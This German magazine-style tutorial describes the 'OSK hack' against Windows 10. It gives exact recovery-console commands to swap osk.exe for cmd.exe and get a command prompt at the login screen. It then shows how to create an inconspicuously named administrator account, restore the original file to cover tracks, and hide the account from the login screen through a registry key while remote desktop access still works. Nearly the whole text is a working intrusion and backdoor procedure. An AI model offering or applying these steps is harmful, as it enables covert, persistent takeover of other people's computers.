So funktioniert der OSK-Hack
Booten Sie den PC mit einer Windows-10-DVD. Ob Home- oder Pro-Version, spielt keine Rolle, wichtig ist nur, die richtige Hardware-Plattform: 64 oder 32 Bit.
Nach dem Booten wählen Sie die Systemsprache Deutsch aus und klicken auf dem nächsten Bildschirm auf Computerreparaturoptionen. Über Problembehandlung/Erweiterte Optionen kommen Sie zur Eingabeaufforderung, die standardmäßig auf dem Laufwerk x:\Sources> startet.
Wechseln Sie auf das Laufwerk, auf dem Windows installiert ist. Bei den meisten Windows-10-Installationen heißt dies an dieser Stelle D:, da C: auf die RecoveryPartition verweist, wie sich mit dem dirBefehl leicht feststellen lässt.
Benennen Sie jetzt die Datei osk.exe um und kopieren Sie die Eingabeauforderung cmd.exe als osk.exe. D:> cd \windows\system32 D:\windows\system32> copy osk.exe osk.ex D:\windows\system32> copy cmd.exe osk.exe
Schließen Sie das Eingabeaufforderungsfenster und klicken Sie auf Fortsetzen, um den PC neu zu starten. Klicken Sie auf dem Anmeldebildschirm auf das Symbol für die erleichterte Bedienung rechts unten. Wählen Sie hier die Option Bildschirmtastatur. Anstelle der Bildschirmtastatur öffnet sich ein Eingabeaufforderungsfenster.
Legen Sie einen neuen Benutzer mit einem unauffälligen Namen an, im Beispiel sysupgrade: net user sysupgrade pwxxx /add Der Parameter pwxxx bezeichnet das Passwort des neuen Benutzers. Nehmen Sie diesen Benutzer in die Gruppe der Administratoren auf, um ihm Vollzugriff auf den PC zu gewähren. net localgroup administratoren sysupgrade /add
Sollte auf dem gehackten PC jemand tatsächlich bei der Anmeldung die Bildschirmtastatur nutzen wollen, erscheint stattdessen die Eingabeaufforderung. Um die Spuren zu verwischen, stellen Sie die Originaldatei osk.exe wieder her. D:\windows\system32> copy osk.ex osk. exe D:\windows\system32> del osk.ex
Schließen Sie das Eingabeaufforderungsfenster und drücken Sie die EnterTaste, um vom Sperrbildschirm auf den Anmeldebildschirm zu kommen. Hier erscheint unten links der neue Benutzer, mit dem Sie sich mit dem selbstgewählten Passwort anmelden können. Jetzt können Sie mit Administratorrechten über den PC verfügen und unter anderem auch über den Befehl control userpasswords2 das Passwort des Originalbenutzers ändern oder zurücksetzen.
Benutzer verstecken
Mit einem Registry-Hack können Sie den Benutzer auf dem Anmeldebildschirm verstecken. Eine Anmeldung über eine Remote-Desktop-Verbindung oder Zugriff auf die Freigaben des PCs sind mit dem neuen Administrator weiterhin möglich. Gehen Sie im Registry-Editor in den RegistryZweig: HKEY_LOCAL_MACHINE\Software\ Microsoft\WindowsNT\CurrentVersion\ Winlogon. Legen Sie dort einen Unterschlüssel SpecialAccounts an und darin einen weiteren Schlüssel UserList. Legen Sie dort einen neuen DWORD32-Wert mit dem Namen des zu versteckenden Benutzers an und lassen Sie dessen Inhalt auf 0 stehen.